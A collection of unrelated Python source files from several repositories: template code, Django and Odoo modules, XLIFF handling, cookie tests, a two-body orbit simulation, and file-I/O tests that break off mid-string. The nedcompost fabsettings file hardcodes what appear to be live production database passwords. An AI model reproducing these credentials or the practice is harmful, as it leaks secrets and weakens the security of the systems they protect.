from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers

##################################################
## MODULE CONSTANTS
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1406885498.501688
__CHEETAH_genTimestamp__ = 'Fri Aug  1 18:31:38 2014'
__CHEETAH_src__ = '/home/wslee2/models/5-wo/force1plus/openpli3.0/build-force1plus/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-1+git5+3c0c4fbdb28d7153bf2140459b553b3d5cdd4149-r0/git/plugin/controllers/views/web/gettags.tmpl'
__CHEETAH_srcLastModified__ = 'Fri Aug  1 18:30:05 2014'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'

if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
    raise AssertionError(
      'This template was compiled with Cheetah version'
      ' %s. Templates compiled before version %s must be recompiled.'%(
         __CHEETAH_version__, RequiredCheetahVersion))

##################################################
## CLASSES

class gettags(Template):
    # Renders the e2tags XML document from the 'tags' search-list entry.

    ##################################################
    ## CHEETAH GENERATED METHODS


    def __init__(self, *args, **KWs):

        super(gettags, self).__init__(*args, **KWs)
        if not self._CHEETAH__instanceInitialized:
            cheetahKWArgs = {}
            allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
            for k,v in KWs.items():
                if k in allowedKWs: cheetahKWArgs[k] = v
            self._initCheetahInstance(**cheetahKWArgs)


    def respond(self, trans=None):



        ## CHEETAH: main method generated for this template
        if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
            trans = self.transaction # is None unless self.awake() was called
        if not trans:
            trans = DummyTransaction()
            _dummyTrans = True
        else: _dummyTrans = False
        write = trans.response().write
        SL = self._CHEETAH__searchList
        _filter = self._CHEETAH__currentFilter

        ########################################
        ## START - generated method body

        _orig_filter_91099948 = _filter
        filterName = u'WebSafe'
        if self._CHEETAH__filters.has_key("WebSafe"):
            _filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]
        else:
            _filter = self._CHEETAH__currentFilter = \
                        self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter
        write(u'''<?xml version="1.0" encoding="UTF-8"?>
<e2tags>
''')
        for tag in VFFSL(SL,"tags",True): # generated from line 4, col 2
            write(u'''\t\t<e2tag>''')
            _v = VFFSL(SL,"tag",True) # u'$tag' on line 5, col 10
            if _v is not None: write(_filter(_v, rawExpr=u'$tag')) # from line 5, col 10.
            write(u'''</e2tag>
''')
        write(u'''</e2tags>
''')

        _filter = self._CHEETAH__currentFilter = _orig_filter_91099948

        ########################################
        ## END - generated method body

        return _dummyTrans and trans.response().getvalue() or ""

    ##################################################
    ## CHEETAH GENERATED ATTRIBUTES


    _CHEETAH__instanceInitialized = False

    _CHEETAH_version = __CHEETAH_version__

    _CHEETAH_versionTuple = __CHEETAH_versionTuple__

    _CHEETAH_genTime = __CHEETAH_genTime__

    _CHEETAH_genTimestamp = __CHEETAH_genTimestamp__

    _CHEETAH_src = __CHEETAH_src__

    _CHEETAH_srcLastModified = __CHEETAH_srcLastModified__

    _mainCheetahMethod_for_gettags= 'respond'

## END CLASS DEFINITION

if not hasattr(gettags, '_initCheetahAttributes'):
    templateAPIClass = getattr(gettags, '_CHEETAH_templateClass', Template)
    templateAPIClass._addCheetahPlumbingCodeToClass(gettags)


# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/

##################################################
## if run from command line:
if __name__ == '__main__':
    from Cheetah.TemplateCmdLineIface import CmdLineIface
    CmdLineIface(templateObj=gettags()).run()
marios-zindilis/musicbrainz-django-models
musicbrainz_django_models/models/editor_subscribe_label_deleted.py
""" .. module:: editor_subscribe_label_deleted The **Editor Subscribe Label Deleted** Model. PostgreSQL Definition --------------------- The :code:`editor_subscribe_label_deleted` table is defined in the MusicBrainz Server as: .. code-block:: sql CREATE TABLE editor_subscribe_label_deleted ( editor INTEGER NOT NULL, -- PK, references editor.id gid UUID NOT NULL, -- PK, references deleted_entity.gid deleted_by INTEGER NOT NULL -- references edit.id ); """ from django.db import models from django.utils.encoding import python_2_unicode_compatible @python_2_unicode_compatible class editor_subscribe_label_deleted(models.Model): """ Not all parameters are listed here, only those that present some interest in their Django implementation. :param editor: references :class:`.editor` :param gid: references :class:`.deleted_entity` :param deleted_by: references :class:`.edit` """ editor = models.OneToOneField('editor', primary_key=True) gid = models.OneToOneField('deleted_entity') deleted_by = models.ForeignKey('edit') def __str__(self): return 'Editor Subscribe Label Deleted' class Meta: db_table = 'editor_subscribe_label_deleted'
3dfxsoftware/cbss-addons
mass_mailing/controllers/main.py
import werkzeug from openerp import http, SUPERUSER_ID from openerp.http import request class MassMailController(http.Controller): @http.route('/mail/track/<int:mail_id>/blank.gif', type='http', auth='none') def track_mail_open(self, mail_id, **post): """ Email tracking. """ mail_mail_stats = request.registry.get('mail.mail.statistics') mail_mail_stats.set_opened(request.cr, SUPERUSER_ID, mail_mail_ids=[mail_id]) response = werkzeug.wrappers.Response() response.mimetype = 'image/gif' response.data = 'R0lGODlhAQABAIAAANvf7wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='.decode('base64') return response @http.route(['/mail/mailing/<int:mailing_id>/unsubscribe'], type='http', auth='none') def mailing(self, mailing_id, email=None, res_id=None, **post): cr, uid, context = request.cr, request.uid, request.context MassMailing = request.registry['mail.mass_mailing'] mailing_ids = MassMailing.exists(cr, SUPERUSER_ID, [mailing_id], context=context) if not mailing_ids: return 'KO' mailing = MassMailing.browse(cr, SUPERUSER_ID, mailing_ids[0], context=context) if mailing.mailing_model == 'mail.mass_mailing.contact': list_ids = [l.id for l in mailing.contact_list_ids] record_ids = request.registry[mailing.mailing_model].search(cr, SUPERUSER_ID, [('list_id', 'in', list_ids), ('id', '=', res_id), ('email', 'ilike', email)], context=context) request.registry[mailing.mailing_model].write(cr, SUPERUSER_ID, record_ids, {'opt_out': True}, context=context) else: email_fname = None if 'email_from' in request.registry[mailing.mailing_model]._all_columns: email_fname = 'email_from' elif 'email' in request.registry[mailing.mailing_model]._all_columns: email_fname = 'email' if email_fname: record_ids = request.registry[mailing.mailing_model].search(cr, SUPERUSER_ID, [('id', '=', res_id), (email_fname, 'ilike', email)], context=context) if 'opt_out' in request.registry[mailing.mailing_model]._all_columns: request.registry[mailing.mailing_model].write(cr, SUPERUSER_ID, record_ids, {'opt_out': True}, 
context=context) return 'OK'
miurahr/translate
translate/storage/poxliff.py
# # Copyright 2006-2009 Zuza Software Foundation # # This file is part of the Translate Toolkit. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/>. """XLIFF classes specifically suited for handling the PO representation in XLIFF. This way the API supports plurals as if it was a PO file, for example. """ import re from lxml import etree from translate.misc.multistring import multistring from translate.misc.xml_helpers import setXMLspace from translate.storage import base, lisa, poheader, xliff from translate.storage.placeables import general def hasplurals(thing): if not isinstance(thing, multistring): return False return len(thing.strings) > 1 class PoXliffUnit(xliff.xliffunit): """A class to specifically handle the plural units created from a po file.""" rich_parsers = general.parsers def __init__(self, source=None, empty=False, **kwargs): self._rich_source = None self._rich_target = None self._state_n = 0 self.units = [] if empty: return if not hasplurals(source): super().__init__(source) return self.xmlelement = etree.Element(self.namespaced("group")) self.xmlelement.set("restype", "x-gettext-plurals") self.source = source def __eq__(self, other): if isinstance(other, PoXliffUnit): if len(self.units) != len(other.units): return False if not super().__eq__(other): return False for i in range(len(self.units) - 1): if not self.units[i + 1] == other.units[i + 1]: return False return True if 
len(self.units) <= 1: if isinstance(other, lisa.LISAunit): return super().__eq__(other) else: return self.source == other.source and self.target == other.target return False # XXX: We don't return language nodes correctly at the moment # def getlanguageNodes(self): # if not self.hasplural(): # return super().getlanguageNodes() # else: # return self.units[0].getlanguageNodes() @property def source(self): if not self.hasplural(): return super().source return multistring([unit.source for unit in self.units]) @source.setter def source(self, source): self.setsource(source, sourcelang="en") def setsource(self, source, sourcelang="en"): # TODO: consider changing from plural to singular, etc. self._rich_source = None if not hasplurals(source): super().setsource(source, sourcelang) else: target = self.target for unit in self.units: try: self.xmlelement.remove(unit.xmlelement) except ValueError: pass self.units = [] for s in source.strings: newunit = xliff.xliffunit(s) # newunit.namespace = self.namespace #XXX?necessary? 
self.units.append(newunit) self.xmlelement.append(newunit.xmlelement) self.target = target # We don't support any rich strings yet multistring_to_rich = base.TranslationUnit.multistring_to_rich rich_to_multistring = base.TranslationUnit.rich_to_multistring rich_source = base.TranslationUnit.rich_source rich_target = base.TranslationUnit.rich_target def gettarget(self, lang=None): if self.hasplural(): strings = [unit.target for unit in self.units] if strings: return multistring(strings) else: return None else: return super().gettarget(lang) def settarget(self, target, lang="xx", append=False): self._rich_target = None if self.target == target: return if not self.hasplural(): super().settarget(target, lang, append) return if not isinstance(target, multistring): target = multistring(target) source = self.source sourcel = len(source.strings) targetl = len(target.strings) if sourcel < targetl: sources = source.strings + [source.strings[-1]] * (targetl - sourcel) targets = target.strings id = self.getid() self.source = multistring(sources) self.setid(id) elif targetl < sourcel: targets = target.strings + [""] * (sourcel - targetl) else: targets = target.strings for i in range(len(self.units)): self.units[i].target = targets[i] def addnote(self, text, origin=None, position="append"): """Add a note specifically in a "note" tag""" note = etree.SubElement(self.xmlelement, self.namespaced("note")) note.text = text if origin: note.set("from", origin) for unit in self.units[1:]: unit.addnote(text, origin) def getnotes(self, origin=None): # NOTE: We support both <context> and <note> tags in xliff files for comments if origin == "translator": notes = super().getnotes("translator") trancomments = self.gettranslatorcomments() if notes == trancomments or trancomments.find(notes) >= 0: notes = "" elif notes.find(trancomments) >= 0: trancomments = notes notes = "" return trancomments + notes elif origin in ["programmer", "developer", "source code"]: devcomments = 
super().getnotes("developer") autocomments = self.getautomaticcomments() if devcomments == autocomments or autocomments.find(devcomments) >= 0: devcomments = "" elif devcomments.find(autocomments) >= 0: autocomments = devcomments devcomments = "" return autocomments else: return super().getnotes(origin) def markfuzzy(self, value=True): super().markfuzzy(value) for unit in self.units[1:]: unit.markfuzzy(value) def marktranslated(self): super().marktranslated() for unit in self.units[1:]: unit.marktranslated() def setid(self, id): super().setid(id) if len(self.units) > 1: for i in range(len(self.units)): self.units[i].setid("%s[%d]" % (id, i)) def getlocations(self): """Returns all the references (source locations)""" groups = self.getcontextgroups("po-reference") references = [] for group in groups: sourcefile = "" linenumber = "" for (type, text) in group: if type == "sourcefile": sourcefile = text elif type == "linenumber": linenumber = text assert sourcefile if linenumber: sourcefile = sourcefile + ":" + linenumber references.append(sourcefile) return references def getautomaticcomments(self): """Returns the automatic comments (x-po-autocomment), which corresponds to the #. style po comments. """ def hasautocomment(grp): return grp[0] == "x-po-autocomment" groups = self.getcontextgroups("po-entry") comments = [] for group in groups: commentpairs = filter(hasautocomment, group) for (type, text) in commentpairs: comments.append(text) return "\n".join(comments) def gettranslatorcomments(self): """Returns the translator comments (x-po-trancomment), which corresponds to the # style po comments. 
""" def hastrancomment(grp): return grp[0] == "x-po-trancomment" groups = self.getcontextgroups("po-entry") comments = [] for group in groups: commentpairs = filter(hastrancomment, group) for (type, text) in commentpairs: comments.append(text) return "\n".join(comments) def isheader(self): return "gettext-domain-header" in (self.getrestype() or "") def istranslatable(self): return super().istranslatable() and not self.isheader() @classmethod def createfromxmlElement(cls, element, namespace=None): if element.tag.endswith("trans-unit"): object = cls(None, empty=True) object.xmlelement = element object.namespace = namespace return object assert element.tag.endswith("group") group = cls(None, empty=True) group.xmlelement = element group.namespace = namespace units = list(element.iterdescendants(group.namespaced("trans-unit"))) for unit in units: subunit = xliff.xliffunit.createfromxmlElement(unit) subunit.namespace = namespace group.units.append(subunit) return group def hasplural(self): return self.xmlelement.tag == self.namespaced("group") class PoXliffFile(xliff.xlifffile, poheader.poheader): """a file for the po variant of Xliff files""" UnitClass = PoXliffUnit def __init__(self, *args, **kwargs): if "sourcelanguage" not in kwargs: kwargs["sourcelanguage"] = "en-US" xliff.xlifffile.__init__(self, *args, **kwargs) def createfilenode(self, filename, sourcelanguage="en-US", datatype="po"): # Let's ignore the sourcelanguage parameter opting for the internal # one. 
PO files will probably be one language return super().createfilenode( filename, sourcelanguage=self.sourcelanguage, datatype="po" ) def _insert_header(self, header): header.xmlelement.set("restype", "x-gettext-domain-header") header.xmlelement.set("approved", "no") setXMLspace(header.xmlelement, "preserve") self.addunit(header) def addheaderunit(self, target, filename): unit = self.addsourceunit(target, filename, True) unit.target = target unit.xmlelement.set("restype", "x-gettext-domain-header") unit.xmlelement.set("approved", "no") setXMLspace(unit.xmlelement, "preserve") return unit def addplural(self, source, target, filename, createifmissing=False): """This method should now be unnecessary, but is left for reference""" assert isinstance(source, multistring) if not isinstance(target, multistring): target = multistring(target) sourcel = len(source.strings) targetl = len(target.strings) if sourcel < targetl: sources = source.strings + [source.strings[-1]] * targetl - sourcel targets = target.strings else: sources = source.strings targets = target.strings self._messagenum += 1 pluralnum = 0 group = self.creategroup(filename, True, restype="x-gettext-plural") for (src, tgt) in zip(sources, targets): unit = self.UnitClass(src) unit.target = tgt unit.setid("%d[%d]" % (self._messagenum, pluralnum)) pluralnum += 1 group.append(unit.xmlelement) self.units.append(unit) if pluralnum < sourcel: for string in sources[pluralnum:]: unit = self.UnitClass(src) unit.xmlelement.set("translate", "no") unit.setid("%d[%d]" % (self._messagenum, pluralnum)) pluralnum += 1 group.append(unit.xmlelement) self.units.append(unit) return self.units[-pluralnum] def parse(self, xml): """Populates this object from the given xml string""" # TODO: Make more robust def ispluralgroup(node): """determines whether the xml node refers to a getttext plural""" return node.get("restype") == "x-gettext-plurals" def isnonpluralunit(node): """determindes whether the xml node contains a plural like id. 
We want to filter out all the plural nodes, except the very first one in each group. """ return re.match(r".+\[[123456]\]$", node.get("id") or "") is None def pluralunits(pluralgroups): for pluralgroup in pluralgroups: yield self.UnitClass.createfromxmlElement( pluralgroup, namespace=self.namespace ) self.filename = getattr(xml, "name", "") if hasattr(xml, "read"): xml.seek(0) xmlsrc = xml.read() xml = xmlsrc parser = etree.XMLParser(resolve_entities=False) self.document = etree.fromstring(xml, parser).getroottree() self.initbody() root_node = self.document.getroot() assert root_node.tag == self.namespaced(self.rootNode) groups = root_node.iterdescendants(self.namespaced("group")) pluralgroups = filter(ispluralgroup, groups) termEntries = root_node.iterdescendants( self.namespaced(self.UnitClass.rootNode) ) singularunits = list(filter(isnonpluralunit, termEntries)) if len(singularunits) == 0: return pluralunit_iter = pluralunits(pluralgroups) nextplural = next(pluralunit_iter, None) for entry in singularunits: term = self.UnitClass.createfromxmlElement(entry, namespace=self.namespace) if nextplural and str(term.getid()) == ("%s[0]" % nextplural.getid()): self.addunit(nextplural, new=False) nextplural = next(pluralunit_iter, None) else: self.addunit(term, new=False)
mikf/gallery-dl
test/test_cookies.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright 2017-2022 Mike Fährmann # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation. import os import sys import unittest from unittest import mock import time import logging import tempfile from os.path import join sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) from gallery_dl import config, extractor # noqa E402 class TestCookiejar(unittest.TestCase): @classmethod def setUpClass(cls): cls.path = tempfile.TemporaryDirectory() cls.cookiefile = join(cls.path.name, "cookies.txt") with open(cls.cookiefile, "w") as file: file.write("""# HTTP Cookie File .example.org\tTRUE\t/\tFALSE\t253402210800\tNAME\tVALUE """) cls.invalid_cookiefile = join(cls.path.name, "invalid.txt") with open(cls.invalid_cookiefile, "w") as file: file.write("""# asd .example.org\tTRUE/FALSE\t253402210800\tNAME\tVALUE """) @classmethod def tearDownClass(cls): cls.path.cleanup() config.clear() def test_cookiefile(self): config.set((), "cookies", self.cookiefile) cookies = extractor.find("test:").session.cookies self.assertEqual(len(cookies), 1) cookie = next(iter(cookies)) self.assertEqual(cookie.domain, ".example.org") self.assertEqual(cookie.path , "/") self.assertEqual(cookie.name , "NAME") self.assertEqual(cookie.value , "VALUE") def test_invalid_cookiefile(self): self._test_warning(self.invalid_cookiefile, ValueError) def test_invalid_filename(self): self._test_warning(join(self.path.name, "nothing"), FileNotFoundError) def _test_warning(self, filename, exc): config.set((), "cookies", filename) log = logging.getLogger("test") with mock.patch.object(log, "warning") as mock_warning: cookies = extractor.find("test:").session.cookies self.assertEqual(len(cookies), 0) self.assertEqual(mock_warning.call_count, 1) self.assertEqual(mock_warning.call_args[0][0], "cookies: %s") 
self.assertIsInstance(mock_warning.call_args[0][1], exc) class TestCookiedict(unittest.TestCase): def setUp(self): self.cdict = {"NAME1": "VALUE1", "NAME2": "VALUE2"} config.set((), "cookies", self.cdict) def tearDown(self): config.clear() def test_dict(self): cookies = extractor.find("test:").session.cookies self.assertEqual(len(cookies), len(self.cdict)) self.assertEqual(sorted(cookies.keys()), sorted(self.cdict.keys())) self.assertEqual(sorted(cookies.values()), sorted(self.cdict.values())) def test_domain(self): for category in ["exhentai", "idolcomplex", "nijie", "seiga"]: extr = _get_extractor(category) cookies = extr.session.cookies for key in self.cdict: self.assertTrue(key in cookies) for c in cookies: self.assertEqual(c.domain, extr.cookiedomain) class TestCookieLogin(unittest.TestCase): def tearDown(self): config.clear() def test_cookie_login(self): extr_cookies = { "exhentai" : ("ipb_member_id", "ipb_pass_hash"), "idolcomplex": ("login", "pass_hash"), "nijie" : ("nemail", "nlogin"), "seiga" : ("user_session",), } for category, cookienames in extr_cookies.items(): cookies = {name: "value" for name in cookienames} config.set((), "cookies", cookies) extr = _get_extractor(category) with mock.patch.object(extr, "_login_impl") as mock_login: extr.login() mock_login.assert_not_called() class TestCookieUtils(unittest.TestCase): def test_check_cookies(self): extr = extractor.find("test:") self.assertFalse(extr._cookiejar, "empty") self.assertFalse(extr.cookiedomain, "empty") # always returns False when checking for empty cookie list self.assertFalse(extr._check_cookies(())) self.assertFalse(extr._check_cookies(("a",))) self.assertFalse(extr._check_cookies(("a", "b"))) self.assertFalse(extr._check_cookies(("a", "b", "c"))) extr._cookiejar.set("a", "1") self.assertTrue(extr._check_cookies(("a",))) self.assertFalse(extr._check_cookies(("a", "b"))) self.assertFalse(extr._check_cookies(("a", "b", "c"))) extr._cookiejar.set("b", "2") 
self.assertTrue(extr._check_cookies(("a",))) self.assertTrue(extr._check_cookies(("a", "b"))) self.assertFalse(extr._check_cookies(("a", "b", "c"))) def test_check_cookies_domain(self): extr = extractor.find("test:") self.assertFalse(extr._cookiejar, "empty") extr.cookiedomain = ".example.org" self.assertFalse(extr._check_cookies(("a",))) self.assertFalse(extr._check_cookies(("a", "b"))) extr._cookiejar.set("a", "1") self.assertFalse(extr._check_cookies(("a",))) extr._cookiejar.set("a", "1", domain=extr.cookiedomain) self.assertTrue(extr._check_cookies(("a",))) extr._cookiejar.set("a", "1", domain="www" + extr.cookiedomain) self.assertEqual(len(extr._cookiejar), 3) self.assertTrue(extr._check_cookies(("a",))) extr._cookiejar.set("b", "2", domain=extr.cookiedomain) extr._cookiejar.set("c", "3", domain=extr.cookiedomain) self.assertTrue(extr._check_cookies(("a", "b", "c"))) def test_check_cookies_expires(self): extr = extractor.find("test:") self.assertFalse(extr._cookiejar, "empty") self.assertFalse(extr.cookiedomain, "empty") now = int(time.time()) log = logging.getLogger("test") extr._cookiejar.set("a", "1", expires=now-100) with mock.patch.object(log, "warning") as mw: self.assertFalse(extr._check_cookies(("a",))) self.assertEqual(mw.call_count, 1) self.assertEqual(mw.call_args[0], ("Cookie '%s' has expired", "a")) extr._cookiejar.set("a", "1", expires=now+100) with mock.patch.object(log, "warning") as mw: self.assertFalse(extr._check_cookies(("a",))) self.assertEqual(mw.call_count, 1) self.assertEqual(mw.call_args[0], ( "Cookie '%s' will expire in less than %s hour%s", "a", 1, "")) extr._cookiejar.set("a", "1", expires=now+100+7200) with mock.patch.object(log, "warning") as mw: self.assertFalse(extr._check_cookies(("a",))) self.assertEqual(mw.call_count, 1) self.assertEqual(mw.call_args[0], ( "Cookie '%s' will expire in less than %s hour%s", "a", 3, "s")) extr._cookiejar.set("a", "1", expires=now+100+24*3600) with mock.patch.object(log, "warning") as mw: 
self.assertTrue(extr._check_cookies(("a",))) self.assertEqual(mw.call_count, 0) def _get_extractor(category): for extr in extractor.extractors(): if extr.category == category and hasattr(extr, "_login_impl"): url = next(extr._get_tests())[0] return extr.from_url(url) if __name__ == "__main__": unittest.main()
amites/nedcompost_wordpress
fabsettings.py
from os import path try: from lib.settings_build import Configure except ImportError: import sys from os.path import expanduser, join sys.path.append(join(expanduser("~"), 'workspace/automation/launchy')) from lib.settings_build import Configure class Default(Configure): def __init__(self): self.beta = False self.local = False self.project = 'nedcompost' self.php = True self.database_name = self.project self.database_user = self.project self.path_project_root = path.join('/mnt', self.project) self.setDefaults() if getattr(self, 'host', False): self.setHost() class Local(Default): def __init__(self): self.beta = True self.local = True self.database_root_password = 'password' super(Local, self).__init__() class Production(Default): def __init__(self): self.host = ['aws-php-3', ] self.domain = 'nedcompost.org' self.database_root_password = 'password' # self.database_password = 'iNcJ%kx87[M>L:!6pkY$fXZIu' self.database_password = 'zHR-mp)@ZZydJ=s9R}*S+4,!a' super(Production, self).__init__() class Beta(Default): def __init__(self): self.beta = True self.host = ['aws-php-3', ] self.domain = 'nedcompost.mitesdesign.com' self.database_root_password = 'password' self.database_password = 'zHR-mp)@ZZydJ=s9R}*S+4,!a' super(Beta, self).__init__() try: from local_settings import * except ImportError: pass
smorad/ast119
hw5.py
from numpy import * from matplotlib.pyplot import * import scipy.constants as sc import copy import scipy.integrate as integ # test sun/earth with hw5(1.989e30,5.972e24,149.6e6,0.0167,1000) def hw5(m1, m2, a, e, tmax, tstep=0.001, tplot=0.025, method='leapfrog'): if method != 'leapfrog' and method != 'odeint': print("That's not a method") return() # initialize commonly used variables period = sqrt((4*(pi**2)*(a**3)) / (sc.G*(m1 + m2))) dt = period*tstep # initialize objects at time 0 q = m1 / m2 r0 = (1-e)*a/(1+q) v0 = (1/(1+q))*sqrt((1+e)/(1-e))*sqrt(sc.G*(m1+m2)/a) rv = array([r0, 0, 0, v0, -q*r0, 0, 0, -q*v0]) # set up figure figure(1) gca().set_aspect('equal') xlim([-2*a, 2*a]) ylim([-2*a, 2*a]) rv_list = [] if method == 'leapfrog': timeCounter = 0 frameCounter = 0 while timeCounter < tmax: # plot positions if tplot time has passed if frameCounter >= tplot: frameCounter = 0 rv_list.append(copy.deepcopy(rv)) # calc positions rv[0] = rv[0] + rv[2]*dt rv[1] = rv[1] + rv[3]*dt rv[4] = rv[4] + rv[6]*dt rv[5] = rv[5] + rv[7]*dt # calc acceleration r = array([rv[0] - rv[4], rv[1] - rv[5]]) force = ((sc.G*m1*m2)/(np.linalg.norm(r)**2))*(r/np.linalg.norm(r)) # calc velocity rv[2] = rv[2] - (force[0]/m1)*dt rv[3] = rv[3] - (force[1]/m1)*dt rv[6] = rv[6] + (force[0]/m2)*dt rv[7] = rv[7] + (force[1]/m2)*dt # increment counters timeCounter += tstep frameCounter += tstep # plot final position rv_list.append(copy.deepcopy(rv)) rv_list_plot = rv_list else: # odeint rv_list = integ.odeint(deriv, rv, arange(0, tmax*period, dt), (m1, m2)) # needed to calculate using tstep, but we want to plot # using tplot, t_interval = tplot / tstep rv_list_plot = rv_list[::t_interval] # plot for i in range(len(rv_list_plot)): plot(rv_list_plot[i][0],rv_list_plot[i][1],'bo') plot(rv_list_plot[i][4],rv_list_plot[i][5],'go') draw() def deriv(rv, dt, m1, m2): # calc position deriv rv_copy = zeros(8) rv_copy[0] = rv[2] rv_copy[1] = rv[3] rv_copy[4] = rv[6] rv_copy[5] = rv[7] # calc velocity deriv r 
= array([rv[0] - rv[4], rv[1] - rv[5]]) force = ((sc.G*m1*m2)/(np.linalg.norm(r)**2))*(r/np.linalg.norm(r)) rv_copy[2] = - (force[0]/m1) rv_copy[3] = - (force[1]/m1) rv_copy[6] = + (force[0]/m2) rv_copy[7] = + (force[1]/m2) return rv_copy
edwardbadboy/vdsm-ubuntu
tests/fileUtilTests.py
# # Copyright 2012 Red Hat, Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # Refer to the README and COPYING files for full details of the license # import tempfile import os import storage.fileUtils as fileUtils import testValidation from testrunner import VdsmTestCase as TestCaseBase class DirectFileTests(TestCaseBase): @classmethod def getConfigTemplate(cls): return {} def testRead(self): data = """Vestibulum. Libero leo nostra, pede nunc eu. Pellentesque platea lacus morbi nisl montes ve. Ac. A, consectetuer erat, justo eu. Elementum et, phasellus fames et rutrum donec magnis eu bibendum. Arcu, ante aliquam ipsum ut facilisis ad.""" srcFd, srcPath = tempfile.mkstemp() f = os.fdopen(srcFd, "wb") f.write(data) f.flush() f.close() with fileUtils.open_ex(srcPath, "dr") as f: self.assertEquals(f.read(), data) os.unlink(srcPath) def testSeekRead(self): data = """ Habitasse ipsum at fusce litora metus, placerat dui purus aenean ante, ve. Pede hymenaeos ut primis cum, rhoncus, lectus, nunc. Vestibulum curabitur vitae etiam magna auctor velit, mi tempus vivamus orci eros. Pellentesque curabitur risus fermentum eget. Elementum curae, donec nisl egestas ve, ut odio eu nunc elit felis primis id. Ridiculus metus morbi nulla erat, amet nisi. Amet ligula nisi, id penatibus risus in. Purus velit duis. 
Aenean eget, pellentesque eu rhoncus arcu et consectetuer laoreet, augue nisi dictum lacinia urna. Fermentum torquent. Ut interdum vivamus duis. Felis consequat nec pede. Orci sollicitudin parturient orci felis. Enim, diam velit sapien condimentum fames semper nibh. Integer at, egestas pede consectetuer ac augue pharetra dolor non placerat quisque id cursus ultricies. Ligula mi senectus sit. Habitasse. Integer sollicitudin dapibus cum quam. """ self.assertTrue(len(data) > 512) srcFd, srcPath = tempfile.mkstemp() f = os.fdopen(srcFd, "wb") f.write(data) f.flush() f.close() with fileUtils.open_ex(srcPath, "dr") as f: f.seek(512) self.assertEquals(f.read(), data[512:]) os.unlink(srcPath) def testWrite(self): data = """In ut non platea egestas, quisque magnis nunc nostra ac etiam suscipit nec integer sociosqu. Fermentum. Ante orci luctus, ipsum ullamcorper enim arcu class neque inceptos class. Ut, sagittis torquent, commodo facilisi.""" srcFd, srcPath = tempfile.mkstemp() os.close(srcFd) with fileUtils.open_ex(srcPath, "dw") as f: f.write(data) with fileUtils.open_ex(srcPath, "r") as f: self.assertEquals(f.read(len(data)), data) os.unlink(srcPath) def testSmallWrites(self): data = """ Aliquet habitasse tellus. Fringilla faucibus tortor parturient consectetuer sodales, venenatis platea habitant. Hendrerit nostra nunc odio. Primis porttitor consequat enim ridiculus. Taciti nascetur, nibh, convallis sit, cum dis mi. Nonummy justo odio cursus, ac hac curabitur nibh. Tellus. Montes, ut taciti orci ridiculus facilisis nunc. Donec. Risus adipiscing habitant donec vehicula non vitae class, porta vitae senectus. Nascetur felis laoreet integer, tortor ligula. Pellentesque vestibulum cras nostra. Ut sollicitudin posuere, per accumsan curabitur id, nisi fermentum vel, eget netus tristique per, donec, curabitur senectus ut fusce. A. Mauris fringilla senectus et eni facilisis magna inceptos eu, cursus habitant fringilla neque. Nibh. 
Elit facilisis sed, elit, nostra ve torquent dictumst, aenean sapien quam, habitasse in. Eu tempus aptent, diam, nisi risus pharetra, ac, condimentum orci, consequat mollis. Cras lacus augue ultrices proin fermentum nibh sed urna. Ve ipsum ultrices curae, feugiat faucibus proin et elementum vivamus, lectus. Torquent. Tempus facilisi. Cras suspendisse euismod consectetuer ornare nostra. Fusce amet cum amet diam. """ self.assertTrue(len(data) > 512) srcFd, srcPath = tempfile.mkstemp() os.close(srcFd) with fileUtils.open_ex(srcPath, "dw") as f: f.write(data[:512]) f.write(data[512:]) with fileUtils.open_ex(srcPath, "r") as f: self.assertEquals(f.read(len(data)), data) os.unlink(srcPath) def testUpdateRead(self): data = """ Aliquet. Aliquam eni ac nullam iaculis cras ante, adipiscing. Enim eget egestas pretium. Ultricies. Urna cubilia in, hac. Curabitur. Nibh. Purus ridiculus natoque sed id. Feugiat lacus quam, arcu maecenas nec egestas. Hendrerit duis nunc eget dis lacus porttitor per sodales class diam condimentum quisque condimentum nisi ligula. Dapibus blandit arcu nam non ac feugiat diam, dictumst. Ante eget fames eu penatibus in, porta semper accumsan adipiscing tellus in sagittis. Est parturient parturient mi fermentum commodo, per fermentum. Quis duis velit at quam risus mi. Facilisi id fames. Turpis, conubia rhoncus. Id. Elit eni tellus gravida, ut, erat morbi. Euismod, enim a ante 